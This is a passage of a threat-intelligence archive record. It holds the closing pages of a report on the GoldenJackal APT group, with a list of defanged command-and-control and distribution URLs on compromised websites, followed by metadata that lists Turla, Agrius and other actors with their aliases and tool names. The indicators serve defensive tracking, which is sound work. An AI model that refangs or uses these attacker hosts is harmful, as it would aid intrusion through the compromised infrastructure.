C2\r\nhxxp://abert-online[.]de/meeting/plugins[.]php\r\nhxxp://acehigh[.]host/robotx[.]php\r\nhxxp://assistance[.]uz/admin/plugins[.]php\r\nhxxp://cnom[.]sante[.]gov[.]ml/components/com_avreloaded/views/popup/tmpl/header[.]php\r\nhxxp://info[.]merysof[.]am/plugins/search/content/plugins[.]php\r\nhxxp://invest[.]zyrardow[.]pl/admin/model/setting/plugins[.]php\r\nhxxp://weblines[.]gr/gallery/gallery_input[.]php\r\nhxxp://www[.]wetter-bild[.]de/plugins[.]php\r\nhxxps://ajapnyakmc[.]com/wp-content/cache/index[.]php\r\nhxxps://asusiran[.]com/wp-content/plugins/persian-woocommerce/include/class-cache[.]php\r\nhxxps://asusiran[.]com/wp-content/themes/woodmart/inc/modules/cache[.]php\r\nhxxps://croma[.]vn/wp-content/themes/croma/template-parts/footer[.]php\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 22 of 23\n\nhxxps://den-photomaster[.]kz/wp-track[.]php\r\nhxxps://eyetelligence[.]ai/wp-content/themes/cms/inc/template-parts/footer[.]php\r\nhxxps://finasteridehair[.]com/wp-includes/class-wp-network-statistics[.]php\r\nhxxps://gradaran[.]be/wp-content/themes/tb-sound/inc/footer[.]php\r\nhxxps://mehrganhospital[.]com/wp-includes/class-wp-tax-system[.]php\r\nhxxps://meukowcognac[.]com/wp-content/themes/astra/page-flags[.]php\r\nhxxps://nassiraq[.]iq/wp-includes/class-wp-header-styles[.]php\r\nhxxps://new[.]jmcashback[.]com/wp-track[.]php\r\nhxxps://news[.]lmond[.]com/wp-content/themes/newsbook/inc/footer[.]php\r\nhxxps://pabalochistan[.]gov[.]pk/new/wp-content/cache/functions[.]php\r\nhxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/dt-the7/inc/cache[.]php\r\nhxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/twentyfifteen/content-manager[.]php\r\nhxxps://sbj-i[.]com/wp-content/plugins/wp-persian/includes/class-wp-cache[.]php\r\nhxxps://sbj-i[.]com/wp-content/themes/hamyarwp-spacious/cache[.]php\r\nhxxps://sokerpower[.]com/wp-includes/class-wp-header-styles[.]php\r\nhxxps://technocometsolutions[.]com/wp-content/themes/seofy/templates-sample[.]php\r\nhxxps://www[.]djstuff[.]fr/wp-content/themes/twentyfourteen/inc/footer[.]php\r\nhxxps://www[.]perlesoie[.]com/wp-content/plugins/contact-form-7/includes/cache[.]php\r\nhxxps://www[.]perlesoie[.]com/wp-content/themes/flatsome/inc/classes/class-flatsome-cache[.]php\r\nJackalSteal/JackalScreenWatcher C2\r\nhxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php\r\nhxxps://winoptimum[.]com/wp-includes/customize/class-wp-customize-sidebar-refresh.php\r\nDistribution websites\r\nhxxps://www[.]pak-developers[.]net/internal_data/templates/template.html\r\nhxxps://www[.]pak-developers[.]net/internal_data/templates/bottom.jpg\r\nSource: https://securelist.com/goldenjackal-apt-group/109677/\r\nhttps://securelist.com/goldenjackal-apt-group/109677/\r\nPage 23 of 23", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia", "MISPGALAXY" ], "origins": [ "web" ], "references": [ "https://securelist.com/goldenjackal-apt-group/109677/" ], "report_names": [ "109677" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a8356cf9-e9d6-4585-8ccf-d30d3efe142b", "created_at": "2023-06-23T02:04:34.262059Z", "updated_at": "2026-04-10T02:00:04.711064Z", "deleted_at": null, "main_name": "GoldenJackal", "aliases": [], "source_name": "ETDA:GoldenJackal", "tools": [ "JackalControl", "JackalPerInfo", "JackalScreenWatcher", "JackalSteal", "JackalWorm" ], "source_id": "ETDA", "reports": null }, { "id": "2864e40a-f233-4618-ac61-b03760a41cbb", "created_at": "2023-12-01T02:02:34.272108Z", "updated_at": "2026-04-10T02:00:04.97558Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "ETDA:WildCard", "tools": [ "RustDown", "SysJoker" ], "source_id": "ETDA", "reports": null }, { "id": "21e01940-3851-417f-9e90-1a4a2da07033", "created_at": "2022-10-25T16:07:23.299369Z", "updated_at": "2026-04-10T02:00:04.527895Z", "deleted_at": null, "main_name": "Agrius", "aliases": [ "AMERICIUM", "Agonizing Serpens", "BlackShadow", "DEV-0227", "Pink Sandstorm", "SharpBoys", "Spectral Kitten" ], "source_name": "ETDA:Agrius", "tools": [ "ASPXSpy", "ASPXTool", "Agrius", "BFG Agonizer", "BFG Agonizer Wiper", "DEADWOOD", "DETBOSIT", "Detbosit", "IPsec Helper", "Moneybird", "MultiLayer Wiper", "PW", "PartialWasher", "PartialWasher Wiper", "SQLShred", "Sqlextractor" ], "source_id": "ETDA", "reports": null }, { "id": "d1dcfc37-1f9b-4acd-a023-25153f183c2e", "created_at": "2025-08-07T02:03:24.783147Z", "updated_at": "2026-04-10T02:00:03.664754Z", "deleted_at": null, "main_name": "COBALT SHADOW", "aliases": [ "AMERICIUM ", "Agonizing Serpens ", "Agrius", "Agrius ", "BlackShadow", "DEV-0227 ", "Justice Blade ", "Malek Team", "Malek Team ", "MoneyBird ", "Pink Sandstorm ", "Sharp Boyz ", "Spectral Kitten " ], "source_name": "Secureworks:COBALT SHADOW", "tools": [ "Apostle", "DEADWOOD", "Fantasy wiper", "IPsec Helper", "MiniDump", "Moneybird ransomware", "Sandals", "SecretsDump" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "4023e661-f566-4b5b-a06f-9d370403f074", "created_at": "2024-02-02T02:00:04.064685Z", "updated_at": "2026-04-10T02:00:03.547155Z", "deleted_at": null, "main_name": "Pink Sandstorm", "aliases": [ "AMERICIUM", "BlackShadow", "DEV-0022", "Agrius", "Agonizing Serpens", "UNC2428", "Black Shadow", "SPECTRAL KITTEN" ], "source_name": "MISPGALAXY:Pink Sandstorm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bacb81f4-18d1-4dcd-b277-65a9dac41b61", "created_at": "2023-11-04T02:00:07.680044Z", "updated_at": "2026-04-10T02:00:03.390891Z", "deleted_at": null, "main_name": "GoldenJackal", "aliases": [], "source_name": "MISPGALAXY:GoldenJackal", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7d982d5b-3428-483c-8804-c3ab774f1861", "created_at": "2024-11-01T02:00:52.70975Z", "updated_at": "2026-04-10T02:00:05.357255Z", "deleted_at": null, "main_name": "Agrius", "aliases": [ "Agrius", "Pink Sandstorm", "AMERICIUM", "Agonizing Serpens", "BlackShadow" ], "source_name": "MITRE:Agrius", "tools": [ "NBTscan", "Mimikatz", "IPsec Helper", "Moneybird", "MultiLayer Wiper", "DEADWOOD", "BFG Agonizer", "ASPXSpy" ], "source_id": "MITRE", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "256a6a2d-e8a2-4497-b399-628a7fad4b3e", "created_at": "2023-11-30T02:00:07.299845Z", "updated_at": "2026-04-10T02:00:03.484788Z", "deleted_at": null, "main_name": "WildCard", "aliases": [], "source_name": "MISPGALAXY:WildCard", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434907, "ts_updated_at": 1775826685, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/99f08a2d3b149cfb0a3fde372f77fcfa66f5face.pdf", "text": "https://archive.orkl.eu/99f08a2d3b149cfb0a3fde372f77fcfa66f5face.txt", "img": "https://archive.orkl.eu/99f08a2d3b149cfb0a3fde372f77fcfa66f5face.jpg" } }